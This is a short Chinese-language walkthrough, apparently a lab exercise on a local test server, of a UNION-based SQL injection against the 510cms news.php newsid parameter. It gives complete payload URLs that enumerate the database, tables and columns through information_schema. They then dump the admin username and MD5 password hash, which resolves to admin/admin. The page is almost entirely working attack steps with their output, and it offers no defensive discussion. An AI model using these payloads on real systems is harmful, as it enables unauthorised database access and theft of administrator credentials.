ThinkChat2.0新版上线,更智能更精彩,支持会话、画图、阅读、搜索等,送10W Token,即刻开启你的AI之旅 广告
介绍: ![](https://img.kancloud.cn/2f/98/2f98087899959ae4c15639dfc27b3b96_1026x581.png) ![](https://img.kancloud.cn/85/e1/85e1dc8ab771d00003439e777d8c297c_1028x577.png) ![](https://img.kancloud.cn/36/70/36709d4803a2706c8b732afbba73114b_1027x578.png) 实例: ![](https://img.kancloud.cn/36/70/36709d4803a2706c8b732afbba73114b_1027x578.png) 开始爆库: http://127.0.0.1:800/510cms2/news.php?cid=2-1&listid=&newsid=233 union select 1,2,SCHEMA_NAME,4 from information_schema.SCHEMATA limit 0,1 – limit 1,1出现数据库 510cms 爆表: http://127.0.0.1:800/510cms2/news.php?cid=2-1&listid=&newsid=233 union select 1,2,TABLE_NAME,4 from information_schema.TABLES where TABLE_SCHEMA="510cms" – 爆出后台账号密码数据库表 510_admin 爆列: http://127.0.0.1:800/510cms2/news.php?cid=2-1&listid=&newsid=233 union select 1,2,COLUMN_NAME,4 from information_schema.COLUMNS where TABLE_NAME="510_admin" LIMIT 2,1 – name passwd 爆字段 http://127.0.0.1:800/510cms2/news.php?cid=2-1&listid=&newsid=233 union select 1,2,concat(name,0x3c,passwd),4 from 510_admin – admin<21232f297a57a5a743894a0e4a801fc3 admin/admin